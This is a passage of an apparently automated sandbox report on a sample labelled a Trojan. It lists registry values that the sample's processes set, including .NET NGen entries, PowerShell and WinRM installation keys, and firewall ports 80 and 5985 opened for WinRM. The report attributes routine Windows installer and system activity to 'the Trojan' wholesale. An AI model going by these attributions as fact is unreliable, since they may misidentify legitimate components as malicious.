[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EC 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 E6 00 00 00 4D 00 69"
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F2 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F0 00 00 00 53 00 79"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 F9 76 A4 2A A5 32 61 26 1C E2 5C 98 E3 ED C6"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
"ImageList" = "01 00 00 00 00 02 00 00 00 FC 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
The process mscorsvw.exe:2412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 B2 1F 53 3D D3 21 1A 1C 8D 5F B1 30 12 E5 2B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"SIG" = "65 39 A0 50 E9 4F 14 4B 85 A8 07 D9 00 B9 C9 79"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"LastModTime" = "B0 2A 7B 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"MVID" = "B1 10 6C EC A9 F5 C8 9E A5 7E 9E CD 46 C7 CF 57"
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F F7 85 91 F8 72 08 41 B4 A7 81 57 FD D1 7F 71"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "99"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"LastModTime" = "B8 D9 AA 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"SIG" = "EC D0 CD 16 68 09 9B 47 85 11 78 36 0F BB 3D 11"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
The process wsmanhttpconfig.exe:2848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 1E FB 99 AB D1 98 5B F1 41 E5 F0 A0 C2 95 61"
The process wsmanhttpconfig.exe:2452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 3B F3 8E 75 9B 4E 52 64 19 29 DE 18 03 55 E4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "70E26930-EA82-4196-BBE8-84FEE19388CD"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""
The process MsiExec.exe:3168 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 BC 39 50 6E 71 2E BE A4 74 B8 26 91 7D 39 1D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process MsiExec.exe:2812 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 39 89 31 3A 89 13 A9 6A 20 A8 B2 A1 E1 EE E7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:1328 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 89 FC 43 8E 85 87 7F 91 15 F6 43 7A C1 10 CC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq2.tmp\mastermind\,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process update.exe:3572 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"
[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"
[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
